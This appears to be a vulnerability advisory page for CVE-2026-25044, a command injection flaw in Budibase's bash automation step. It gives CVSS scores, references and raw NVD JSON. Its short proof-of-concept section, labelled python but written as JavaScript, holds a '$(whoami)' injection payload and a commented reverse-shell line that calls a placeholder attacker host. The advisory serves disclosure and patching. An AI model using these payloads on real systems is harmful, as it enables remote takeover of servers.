CVE-2026-25044

Description

Budibase is an open-source low-code platform. Prior to version 3.33.4, the bash automation step executes user-provided commands using execSync without proper sanitization or validation. User input is processed through processStringSync which allows template interpolation, potentially allowing arbitrary command execution. This issue has been patched in version 3.33.4.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:* - VULNERABLE

Budibase < 3.33.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC Concept for CVE-2026-25044
// Target: Budibase Bash Automation Step
// Description: Injecting a command using template interpolation syntax.

// The vulnerable function processStringSync allows inputs like:
const malicious_payload = "$(whoami)";

// When this payload is placed in the Bash automation command field,
// the backend executes it via execSync without sanitization.
// Result: The system executes 'whoami' and returns the current user.

// Example of a reverse shell payload (if environment allows):
// const reverse_shell = "$(bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1)";

console.log("Payload to inject: " + malicious_payload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25044
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25044
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25044/
[4] VulDB https://vuldb.com/cve/CVE-2026-25044
[5] https://github.com/Budibase/budibase/releases/tag/3.33.2
[6] https://github.com/Budibase/budibase/security/advisories/GHSA-gjw9-34gf-rp6m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25044", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:35.870", "lastModified": "2026-04-08T21:19:41.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Budibase is an open-source low-code platform. Prior to version 3.33.4, the bash automation step executes user-provided commands using execSync without proper sanitization or validation. User input is processed through processStringSync which allows template interpolation, potentially allowing arbitrary command execution. This issue has been patched in version 3.33.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.33.4", "matchCriteriaId": "B316A29C-7C2F-4102-ACF6-DDB06B3D0AD5"}]}]}], "references": [{"url": "https://github.com/Budibase/budibase/releases/tag/3.33.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-gjw9-34gf-rp6m", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}